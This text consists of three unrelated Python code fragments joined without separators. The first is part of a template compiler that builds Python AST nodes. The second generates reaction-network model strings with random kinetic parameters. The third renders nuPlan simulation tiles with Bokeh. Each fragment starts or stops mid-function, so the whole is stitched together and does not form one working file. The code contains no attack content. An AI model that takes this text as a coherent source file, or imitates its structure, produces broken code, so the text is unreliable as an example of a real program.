arguments=arguments) new_body = func.body = [] if add_buffer: new_body.extend(self.make_buffer_frame(body)) else: new_body.extend(body) if not new_body: new_body.append(Pass()) return func def generate_varscope(self, body): name = gen_name('variable_scope') rv = [ self.make_function(name, body, arguments=['__TK__output', '__TK__escape']), Expr(simple_call(NameX(name), [NameX('__TK__output'), NameX('__TK__escape')])) ] return rv class PyOutputNode(PythonNode): def __init__(self, text): super(PyOutputNode, self).__init__() self.text = text def get_expressions(self): return [self.get_expression()] def get_expression(self): return Str(s=self.text) def generate_ast(self, generator, parent): return self.generate_output_ast(self.get_expression(), generator, parent) class PyTranslatableOutputNode(PyOutputNode): def __init__(self, text, needs_escape=False): super(PyTranslatableOutputNode, self).__init__(text) self.needs_escape = needs_escape def get_expressions(self): return [self.get_expression()] def get_expression(self): name = 'gettext' if self.needs_escape: name = 'egettext' expr = simple_call( NameX(name), [Str(s=self.text)], ) return expr class PyExpressionNode(PythonNode): def __init__(self, expression): super(PyExpressionNode, self).__init__() self.expr = expression def get_expressions(self): return [self.get_expression()] def get_expression(self): return simple_call( NameX('__TK__escape'), [self.get_unescaped_expression()] ) def get_unescaped_expression(self): return get_fragment_ast(self.expr) def generate_ast(self, generator, parent): return self.generate_output_ast(self.get_expression(), generator, parent) class PyCodeNode(PythonNode): def __init__(self, source): super(PyCodeNode, self).__init__() self.source = source def generate_ast(self, generator, parent): return get_fragment_ast(self.source, mode='exec') def coalesce_strings(args): rv = [] str_on = None for i in args: if isinstance(i, Str): if str_on: str_on.s += i.s continue str_on = i else: str_on = None rv.append(i) return rv class PyComplexNode(ComplexNode, PythonNode): def generate_child_ast(self, generator, parent_for_children): rv = [] for i in self.children: rv.extend(i.generate_ast(generator, parent_for_children)) return rv class PyIfNode(PyComplexNode): def __init__(self, expression): super(PyIfNode, self).__init__() self.expression = expression def generate_ast(self, generator, parent): test = get_fragment_ast(self.expression) boolean = static_expr_to_bool(test) if boolean == False: return [] if boolean == True: return self.generate_child_ast(generator, parent) node = If( test=test, body=self.generate_child_ast(generator, self), orelse=[] ) return [node] def PyUnlessNode(self, expression): expression = get_fragment_ast(expression) expression = UnaryOp(op=Not(), operand=expression) return PyIfNode(expression) class PyImportNode(PythonNode): def __init__(self, href, alias): super(PyImportNode, self).__init__() self.href = str(href) self.alias = str(alias) def generate_ast(self, generator, parent): node = Assign( targets=[NameX(str(self.alias), store=True)], value= simple_call( func= Attribute(value=NameX('__TK__runtime', store=False), attr='import_defs', ctx=Load()), args=[ NameX('__TK__original_context'), Str(s=self.href) ] ) ) if parent.is_top_level: generator.add_top_level_import(str(self.alias), node) return [] return [node] class PyAttributeNode(PyComplexNode): def __init__(self, name, value): super(PyAttributeNode, self).__init__() self.name = name def get_expressions(self): rv = [] for i in self.children: rv.extend(i.get_expressions()) return rv def generate_ast(self, generator, parent): if len(self.children) == 1 and \ isinstance(self.children[0], PyExpressionNode): # special case, the attribute contains a single # expression, these are handled by # __TK__output.output_boolean_attr, # given the name, and unescaped expression! return [Expr(simple_call( func=Attribute( value=NameX('__TK__output'), attr='output_boolean_attr', ctx=Load() ), args=[ Str(s=self.name), self.children[0].get_unescaped_expression() ] ))] # otherwise just return the output for the attribute code # like before return self.generate_output_ast( [Str(s=' %s="' % self.name)] + self.get_expressions() + [Str(s='"')], generator, parent ) class PyAttrsNode(PythonNode): def __init__(self, expression): super(PyAttrsNode, self).__init__() self.expression = expression def generate_ast(self, generator, parent): expression = get_fragment_ast(self.expression) output = simple_call( NameX('__TK__output_attrs'), args=[expression] ) return self.generate_output_ast(output, generator, parent) class PyForNode(PyComplexNode): def __init__(self, target_and_expression, parts): super(PyForNode, self).__init__() self.target_and_expression = target_and_expression def generate_contents(self, generator, parent): lineno, col = getattr(self.target_and_expression, 'position', (1, 0)) body = get_fragment_ast( StringWithLocation('for %s: pass' % self.target_and_expression, lineno, col - 4), 'exec', ) for_node = body[0] for_node.body = self.generate_child_ast(generator, self) return [for_node] def generate_ast(self, generator, parent): # TODO: this could be needed to be reinstantiated # return self.generate_varscope(self.generate_contents()) return self.generate_contents(generator, parent) class PyDefineNode(PyComplexNode): def __init__(self, funcspec): super(PyDefineNode, self).__init__() self.position = getattr(funcspec, 'position', (1, 0)) if '(' not in funcspec: funcspec += '()' self.funcspec = funcspec def generate_ast(self, generator, parent): body = get_fragment_ast( StringWithLocation('def %s: pass' % self.funcspec, self.position[0], self.position[1] - 4), "exec" ) def_node = body[0] name = self.funcspec.partition('(')[0] def_node.body = self.make_buffer_frame( self.generate_child_ast(generator, self) ) # move the function out of the closure if parent.is_top_level: generator.add_top_def(def_node.name, def_node) return [] return [def_node] class PyComplexExprNode(PyComplexNode): def get_expressions(self): rv = [] for i in self.children: if hasattr(i, 'get_expression'): rv.append(i.get_expression()) else: rv.extend(i.get_expressions()) return rv def generate_ast(self, generator, parent=None): return self.generate_output_ast(self.get_expressions(), generator, parent) class PyBlockNode(PyComplexNode): def __init__(self, name): super(PyBlockNode, self).__init__() self.name = name def generate_ast(self, generator, parent): is_extended = isinstance(parent, PyExtendsNode) name = self.name blockfunc_name = '__TK__block__%s' % name position = getattr(name, 'position', (1, 0)) body = get_fragment_ast( StringWithLocation( 'def %s():pass' % blockfunc_name, position[0], position[1] - 4), 'exec' ) def_node = body[0] def_node.body = self.make_buffer_frame( self.generate_child_ast(generator, self) ) if not isinstance(name, str): # pragma: python2 name = name.encode('UTF-8') generator.add_block(str(name), def_node, blockfunc_name) if not is_extended: # call the block in place return self.generate_output_ast( [simple_call(NameX(str(self.name)), [])], self, parent, position=position ) else: return [] class PyWithNode(PyComplexNode): def __init__(self, vars): super(PyWithNode, self).__init__() self.vars = vars def generate_ast(self, generator, parent=None): var_defs = get_fragment_ast(self.vars, 'exec') body = var_defs + self.generate_child_ast(generator, self) return self.generate_varscope(body) class PyExtendsNode(PyComplexNode): is_top_level = True def __init__(self, href): super(PyExtendsNode, self).__init__() self.href = href def generate_ast(self, generator, parent=None): generator.make_extended_template(self.href) return self.generate_child_ast(generator, self) def ast_equals(tree1, tree2): x1 = ast.dump(tree1) x2 = ast.dump(tree2) return x1 == x2 def coalesce_outputs(tree): """ Coalesce the constant output expressions __output__('foo') __output__('bar') __output__(baz) __output__('xyzzy') into __output__('foobar', baz, 'xyzzy') """ coalesce_all_outputs = True if coalesce_all_outputs: should_coalesce = lambda n: True else: should_coalesce = lambda n: n.output_args[0].__class__ is Str class OutputCoalescer(NodeVisitor): def visit(self, node): # if - else expression also has a body! it is not we want, though. if hasattr(node, 'body') and isinstance(node.body, Iterable): # coalesce continuous string output nodes new_body = [] output_node = None def coalesce_strs(): if output_node: output_node.value.args[:] = \ coalesce_strings(output_node.value.args) for i in node.body: if hasattr(i, 'output_args') and should_coalesce(i): if output_node: if len(output_node.value.args) + len(i.output_args) > 250: coalesce_strs() output_node = i else: output_node.value.args.extend(i.output_args) continue output_node = i else: coalesce_strs() output_node = None new_body.append(i) coalesce_strs() node.body[:] = new_body NodeVisitor.visit(self, node) def check(self, node): """ Coalesce __TK__output(__TK__escape(literal(x))) into __TK__output(x). """ if not ast_equals(node.func, NameX('__TK__output')): return for i in range(len(node.args)): arg1 = node.args[i] if not arg1.__class__.__name__ == 'Call': continue if not ast_equals(arg1.func, NameX('__TK__escape')): continue if len(arg1.args) != 1: continue arg2 = arg1.args[0] if not arg2.__class__.__name__ == 'Call': continue if not ast_equals(arg2.func, NameX('literal')): continue if len(arg2.args) != 1: continue node.args[i] = arg2.args[0] def visit_Call(self, node): self.check(node) self.generic_visit(node) OutputCoalescer().visit(tree) def remove_locations(node): """ Removes locations from the given AST tree completely """ def
+= '\n' parameter_index = None if 'deg' in kinetics[2]: reaction_index += 1 parameter_index = reaction_index for sp in floating_ids: ant_str += 'J' + str(reaction_index) + ': S' + str(sp) + ' ->; ' + 'k' + str(reaction_index) + '*' \ + 'S' + str(sp) + '\n' reaction_index += 1 ant_str += '\n' ro = list(ro) ro.sort() if kinetics[1] == 'trivial': for each in ro: ant_str += each + ' = ' + str(1) + '\n' else: for each in ro: ant_str += each + ' = ' + str(uniform.rvs(loc=0, scale=1)) + '\n' ant_str += '\n' kf = list(kf) kf.sort() for each in kf: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('kf')][0], scale=kinetics[3][kinetics[2].index('kf')][1] - kinetics[3][kinetics[2].index('kf')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('kf')][0], kinetics[3][kinetics[2].index('kf')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('kf')][0], scale=kinetics[3][kinetics[2].index('kf')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('kf')][0], s=kinetics[3][kinetics[2].index('kf')][1]) ant_str += each + ' = ' + str(const) + '\n' if kf: ant_str += '\n' kr = list(kr) kr.sort() for each in kr: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('kr')][0], scale=kinetics[3][kinetics[2].index('kr')][1] - kinetics[3][kinetics[2].index('kr')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('kr')][0], kinetics[3][kinetics[2].index('kr')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('kr')][0], scale=kinetics[3][kinetics[2].index('kr')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('kr')][0], s=kinetics[3][kinetics[2].index('kr')][1]) ant_str += each + ' = ' + str(const) + '\n' if kr: ant_str += '\n' km = list(km) km.sort() for each in km: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1] - kinetics[3][kinetics[2].index('km')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('km')][0], kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('km')][0], s=kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if km: ant_str += '\n' kma = list(kma) kma.sort() for each in kma: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1] - kinetics[3][kinetics[2].index('km')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('km')][0], kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('km')][0], s=kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kma: ant_str += '\n' kms = list(kms) kms.sort() for each in kms: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1] - kinetics[3][kinetics[2].index('km')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('km')][0], kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('km')][0], s=kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kms: ant_str += '\n' m = list(m) m.sort() for each in m: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1] - kinetics[3][kinetics[2].index('m')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('m')][0], kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('m')][0], s=kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if m: ant_str += '\n' ma = list(ma) ma.sort() for each in ma: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1] - kinetics[3][kinetics[2].index('m')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('m')][0], kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('m')][0], s=kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if ma: ant_str += '\n' ms = list(ms) ms.sort() for each in ms: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1] - kinetics[3][kinetics[2].index('m')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('m')][0], kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('m')][0], s=kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if ms: ant_str += '\n' if 'deg' in kinetics[2]: for _ in floating_ids: if kinetics[1] == 'trivial': ant_str += 'k' + str(parameter_index) + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('deg')][0], scale=kinetics[3][kinetics[2].index('deg')][1] - kinetics[3][kinetics[2].index('deg')][0]) ant_str += 'k' + str(parameter_index) + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('deg')][0], kinetics[3][kinetics[2].index('deg')][1]) ant_str += 'k' + str(parameter_index) + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('deg')][0], scale=kinetics[3][kinetics[2].index('deg')][1]) if const >= 0: ant_str += 'k' + str(parameter_index) + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('deg')][0], s=kinetics[3][kinetics[2].index('deg')][1]) ant_str += 'k' + str(parameter_index) + ' = ' + str(const) + '\n' parameter_index += 1 ant_str += '\n' def get_i_cvalue(ic_ind): ic = None if ic_params == 'trivial': ic = 1 if isinstance(ic_params, list) and ic_params[0] == 'uniform': ic = uniform.rvs(loc=ic_params[1], scale=ic_params[2]-ic_params[1]) if isinstance(ic_params, list) and ic_params[0] == 'loguniform': ic = loguniform.rvs(ic_params[1], ic_params[2]) if isinstance(ic_params, list) and ic_params[0] == 'normal': ic = norm.rvs(loc=ic_params[1], scale=ic_params[2]) if isinstance(ic_params, list) and ic_params[0] == 'lognormal': ic = lognorm.rvs(scale=ic_params[1], s=ic_params[2]) if isinstance(ic_params, list) and ic_params[0] == 'list': ic = ic_params[1][ic_ind] if ic_params is None: ic = uniform.rvs(loc=0, scale=10) return ic for index, b in enumerate(boundary_ids): i_cvalue = get_i_cvalue(b, ) ant_str += 'S' + str(b) + ' = ' + str(i_cvalue) + '\n' ant_str += '\n' for index, b in enumerate(floating_ids): i_cvalue = get_i_cvalue(b) ant_str += 'S' + str(b) + ' = ' + str(i_cvalue) + '\n' if add_enzyme: ant_str += '\n' for index, r in enumerate(reaction_list_copy): ant_str += 'E' + str(index) + ' = 1\n' return ant_str def generate_simple_linear(n_species): reaction_list = [] edge_list = [] node_set = set() last_products = None while True: if not node_set: reactant = 0 else: reactant = max(last_products) product = reactant + 1 last_products = {product} reaction_list.append([0, [reactant], [product], [], [], []]) edge_list.append([reactant, product]) node_set.add(reactant) node_set.add(product) if len(node_set) == n_species: break reaction_list.insert(0, n_species)
<filename>nuplan/planning/nuboard/base/simulation_tile.py import json import logging import lzma import pathlib import pickle from functools import partial from pathlib import Path from typing import Any, Dict, List, Optional import msgpack from bokeh.document.document import Document from bokeh.layouts import gridplot from bokeh.models import ColumnDataSource, Glyph, HoverTool, Line, MultiLine, MultiPolygons, Slider from bokeh.plotting import figure from nuplan.common.actor_state.state_representation import Point2D, StateSE2 from nuplan.common.actor_state.transform_state import get_front_left_corner, get_front_right_corner, \ get_rear_left_corner, get_rear_right_corner, translate_longitudinally from nuplan.common.actor_state.vehicle_parameters import BoxParameters, VehicleParameters from nuplan.common.maps.abstract_map import AbstractMap from nuplan.common.maps.abstract_map_objects import StopLine from nuplan.common.maps.maps_datatypes import SemanticMapLayer, StopLineType from nuplan.planning.nuboard.base.data_class import BokehAgentStates, SimulationScenarioKey from nuplan.planning.nuboard.style import simulation_map_layer_color, simulation_tile_style from nuplan.planning.scenario_builder.abstract_scenario_builder import AbstractScenarioBuilder logger = logging.getLogger(__name__) def extract_source_from_states(states: List[Dict[str, Any]]) -> ColumnDataSource: """ Helper function to get the xy coordinates into ColumnDataSource format from a list of states. :param states: List of states (containing the pose) :return: A ColumnDataSource object containing the xy coordinates. """ x_coords = [] y_coords = [] for state in states: x_coords.append(state['pose'][0]) y_coords.append(state['pose'][1]) source = ColumnDataSource(dict( xs=x_coords, ys=y_coords) ) return source def _extract_serialization_type(first_file: pathlib.Path) -> str: """ Deduce the serialization type :param first_file: serialized file :return: one from ["msgpack", "pickle", "json"]. """ msg_pack = first_file.suffixes == ['.msgpack', '.xz'] msg_pickle = first_file.suffixes == ['.pkl', '.xz'] msg_json = first_file.suffix == ".json" number_of_available_types = int(msg_pack) + int(msg_json) + int(msg_pickle) # We can handle only conclusive serialization type if number_of_available_types != 1: raise RuntimeError(f"Inconclusive file type: {first_file}!") if msg_pickle: return "pickle" elif msg_json: return "json" elif msg_pack: return "msgpack" else: raise RuntimeError("Unknown condition!") def _load_data(file_name: pathlib.Path, serialization_type: str) -> Any: """ Load data from file_name :param file_name: the name of a file which we want to deserialize :param serialization_type: type of serialization of the file :return: deserialized type """ if serialization_type == "json": with open(str(file_name), 'r') as f: # type: ignore return json.load(f) elif serialization_type == "msgpack": with lzma.open(str(file_name), "rb") as f: return msgpack.unpackb(f.read()) elif serialization_type == "pickle": with lzma.open(str(file_name), "rb") as f: return pickle.load(f) else: raise ValueError(f"Unknown serialization type: {serialization_type}!") class SimulationTile: def __init__(self, doc: Document, vehicle_parameters: VehicleParameters, scenario_builder: AbstractScenarioBuilder, period_milliseconds: int = 5000, radius: float = 150.0): """ Scenario simulation tile. :param doc: Bokeh HTML document. :param vehicle_parameters: Ego pose parameters. :param scenario_builder: Scenario builder instance. :param period_milliseconds: Milli seconds to update the tile. :param radius: Map radius. """ self._doc = doc self._vehicle_parameters = vehicle_parameters self._scenario_builder = scenario_builder self._period_milliseconds = period_milliseconds self._radius = radius self._selected_scenario_keys: List[SimulationScenarioKey] = [] self._maps: Dict[str, AbstractMap] = {} def _map_api(self, map_name: str) -> AbstractMap: if map_name not in self._maps: self._maps[map_name] = self._scenario_builder.get_map_api(map_name) return self._maps[map_name] def _init_simulations(self) -> None: """ Initialization of the visualization of simulation panel. """ self._figures: List[figure] = [] self._sliders: List[Slider] = [] self._scenes: List[Dict[Path, Any]] = [] self._ego_state_plots: List[Optional[Glyph]] = [] self._ego_state_trajectory_plots: List[Optional[Glyph]] = [] self._agent_state_plots: List[Optional[Glyph]] = [] self._agent_state_heading_plots: List[Optional[Glyph]] = [] self._agent_state_trajectory_plots: List[Optional[Glyph]] = [] self._ego_state_data_sources: List[List[ColumnDataSource]] = [] self._ego_state_trajectory_data_sources: List[List[ColumnDataSource]] = [] self._agent_data_sources: List[List[ColumnDataSource]] = [] self._agent_state_trajectory_data_sources: List[List[ColumnDataSource]] = [] for figure_index in range(len(self._selected_scenario_keys)): self._scenes.append({}) self._ego_state_plots.append(None) self._ego_state_trajectory_plots.append(None) self._agent_state_plots.append(None) self._agent_state_heading_plots.append(None) self._agent_state_trajectory_plots.append(None) self._ego_state_data_sources.append([]) self._ego_state_trajectory_data_sources.append([]) self._agent_data_sources.append([]) self._agent_state_trajectory_data_sources.append([]) simulation_figure = figure(x_range=(-self._radius, self._radius), y_range=(-self._radius, self._radius), plot_width=simulation_tile_style['figure_sizes'][0], plot_height=simulation_tile_style['figure_sizes'][1], title=f"{self._selected_scenario_keys[figure_index].planner_name}", tools=["pan", "wheel_zoom", "save", "reset"], match_aspect=True, active_scroll="wheel_zoom", margin=simulation_tile_style['figure_margins'], background_fill_color=simulation_tile_style['background_color'], ) simulation_figure.axis.visible = False simulation_figure.xgrid.visible = False simulation_figure.ygrid.visible = False simulation_figure.title.text_font_size = simulation_tile_style['figure_title_text_font_size'] simulation_figure.rect(fill_color=simulation_tile_style['planner_color'], legend_label="Ego") simulation_figure.rect(fill_color=simulation_tile_style['agent_color'], legend_label="Agents") simulation_figure.line(line_color=simulation_tile_style['planner_color'], legend_label="Planned trajectory") simulation_figure.line(line_color=simulation_tile_style['expert_color'], legend_label="Expert trajectory") simulation_figure.legend.background_fill_color = 'lightgray' simulation_figure.legend.label_text_font_style = 'bold' simulation_figure.legend.glyph_height = 25 simulation_figure.legend.glyph_width = 25 slider = Slider(start=0, end=1, value=0, step=1, title="Frame", margin=simulation_tile_style['slider_margins']) slider.on_change("value", partial(self._slider_on_change, figure_index=figure_index)) self._figures.append(simulation_figure) self._sliders.append(slider) @property def figures(self) -> List[figure]: """ Access bokeh figures. :return A list of bokeh figures. """ return self._figures @property def sliders(self) -> List[Slider]: """ Access bokeh sliders. :return A list of bokeh sliders. """ return self._sliders def _update_data_sources(self, scene: Dict[str, Any], figure_index: int, file_index: int) -> None: """ Update data sources once there are new data sources. :param scene: A dict of scene data. :param figure_index: A figure index. :param file_index: A file index. """ if file_index != 0: self._sliders[figure_index].end = file_index self._update_ego_state(ego_state=scene['ego'], figure_index=figure_index) self._update_ego_state_trajectory(trajectory=scene['trajectories']['ego_predicted_trajectory'], figure_index=figure_index) self._update_agents(observations=scene['world'], figure_index=figure_index) def _slider_on_change(self, attr: str, old: int, new: int, figure_index: int) -> None: """ Helper function when a slider changes. :param attr: Attribute name. :param old: Old value. :param new: New value. :param figure_index: Figure index. """ if new != len(self._scenes[figure_index]): self._render_plots(frame_index=new, figure_index=figure_index) def _read_files(self) -> None: """ Read all simulation files to memory. """ for figure_index, simulation_scenario_key in enumerate(self._selected_scenario_keys): sorted_files = sorted(simulation_scenario_key.files, reverse=False) if len(sorted_files) == 0: raise RuntimeError("No files were found!") # Deduce the type of files first_file = sorted_files[0] serialization = _extract_serialization_type(first_file) if len(sorted_files) > 1: # Load scenes from all the available files for file_index, file in enumerate(sorted_files): self._scenes[figure_index][file] = _load_data(file, serialization) self._update_data_sources(self._scenes[figure_index][file], figure_index, file_index) else: # Load all scenes in one go file = first_file scenes = _load_data(file, serialization) scenes = scenes if isinstance(scenes, list) else [scenes] self._load_scenes(figure_index, scenes) def _load_scenes(self, figure_index: int, scenes: List[Dict[str, Any]]) -> None: """ Load all scenes corresponding to figure_index :param figure_index: index of the loading figure :param scenes: all scenes to be loaded """ for file_index, scene in enumerate(scenes): timestamp_us = pathlib.Path(str(scene["ego"]["timestamp_us"])) self._scenes[figure_index][timestamp_us] = scene self._update_data_sources(self._scenes[figure_index][timestamp_us], figure_index, file_index) @staticmethod def _render_simulation_layouts(figures: List[figure], sliders: List[Slider]) -> List[Any]: """ Render simulation layouts. :param figures: A list of figures. :param sliders: A list of sliders. :return: A list of columns or rows. """ grid_layouts = [] for figure_plot, slider in zip(figures, sliders): grid_layouts.append(gridplot([[figure_plot], [slider]])) return grid_layouts def render_simulation_tiles(self, selected_scenario_keys: List[SimulationScenarioKey]) -> List[Any]: """ Render simulation tiles. :param selected_scenario_keys: A list of selected scenario keys. :return A list of bokeh layouts. """ self._selected_scenario_keys = selected_scenario_keys self._init_simulations() self._read_files() if len(self._scenes) > 0: self._render_scenario() layouts = self._render_simulation_layouts(self._figures, self._sliders) return layouts def _render_scenario(self) -> None: """ Render scenario. """ if len(self._scenes) == 0: return for figure_index, scene in enumerate(self._scenes): files = list(scene.keys()) if len(files) == 0: continue # Load the first file only. scene_states = scene[files[0]] self._render_map(figure_index=figure_index, scene=scene_states) expert_ego_trajectory = None if 'ego_expert_trajectory' in scene_states['trajectories']: expert_ego_trajectory = scene_states['trajectories']['ego_expert_trajectory'] if expert_ego_trajectory is not None: self._render_expert_trajectory(expert_ego_trajectory=expert_ego_trajectory, figure_index=figure_index) self._render_plots(frame_index=0, figure_index=figure_index) def _render_map(self, figure_index: int, scene: Dict[str, Any]) -> None: """ Render a map. :param figure_index: Index of the figure. :param scene: A dictionary of scene info. """ map_name = scene['map_name'] map_api = self._map_api(map_name) layer_names = [SemanticMapLayer.LANE_CONNECTOR, SemanticMapLayer.LANE, SemanticMapLayer.CROSSWALK, SemanticMapLayer.INTERSECTION, SemanticMapLayer.STOP_LINE] ego_pose = scene['ego']['pose'] center = Point2D(ego_pose[0], ego_pose[1]) nearest_vector_map = map_api.get_proximal_map_objects(center, self._radius, layer_names) # Filter out stop polygons in turn stop if SemanticMapLayer.STOP_LINE in nearest_vector_map: stop_polygons: List[StopLine] = nearest_vector_map[SemanticMapLayer.STOP_LINE] nearest_vector_map[SemanticMapLayer.STOP_LINE] = [stop_polygon for stop_polygon in stop_polygons if stop_polygon.stop_line_type == StopLineType.TURN_STOP] # Draw polygons polygon_layer_names = \ [(SemanticMapLayer.LANE, simulation_map_layer_color[SemanticMapLayer.LANE]), (SemanticMapLayer.INTERSECTION, simulation_map_layer_color[SemanticMapLayer.INTERSECTION]), (SemanticMapLayer.STOP_LINE, simulation_map_layer_color[SemanticMapLayer.STOP_LINE]), (SemanticMapLayer.CROSSWALK, simulation_map_layer_color[SemanticMapLayer.CROSSWALK])] polygon_xs = [] polygon_ys = [] fill_colors = [] fill_color_alphas = [] line_colors = [] for layer_name, color in polygon_layer_names: layer = nearest_vector_map[layer_name] for map_obj in layer: xs = [] ys = [] coords = map_obj.polygon.exterior.coords for x, y in coords: xs.append(x) ys.append(y) fill_colors.append(color['fill_color']) fill_color_alphas.append(color['fill_color_alpha']) line_colors.append(color['line_color']) polygon_xs.append([[xs]]) polygon_ys.append([[ys]]) polygon_source = ColumnDataSource(dict( xs=polygon_xs, ys=polygon_ys, fill_colors=fill_colors, fill_color_alphas=fill_color_alphas, line_colors=line_colors ) ) polygon_glyph = MultiPolygons(xs="xs", ys="ys", fill_color="fill_colors", fill_alpha='fill_color_alphas', line_color="line_colors") # Draw lines line_layer_names = [(SemanticMapLayer.LANE, simulation_map_layer_color[SemanticMapLayer.BASELINE_PATHS]), (SemanticMapLayer.LANE_CONNECTOR, simulation_map_layer_color[SemanticMapLayer.LANE_CONNECTOR])] line_xs = [] line_ys = [] line_colors = [] line_color_alphas = [] for layer_name, color in line_layer_names: layer = nearest_vector_map[layer_name] for map_obj in layer: xs = [] ys = [] path = map_obj.baseline_path().discrete_path() for pose in path: xs.append(pose.x) ys.append(pose.y) line_colors.append(color['line_color']) line_color_alphas.append(color['line_color_alpha']) line_xs.append(xs) line_ys.append(ys) line_source = ColumnDataSource(dict( xs=line_xs, ys=line_ys, line_colors=line_colors, line_color_alphas=line_color_alphas) ) line_glyph = MultiLine(xs="xs", ys="ys", line_color="line_colors", line_alpha="line_color_alphas", line_width=0.5, 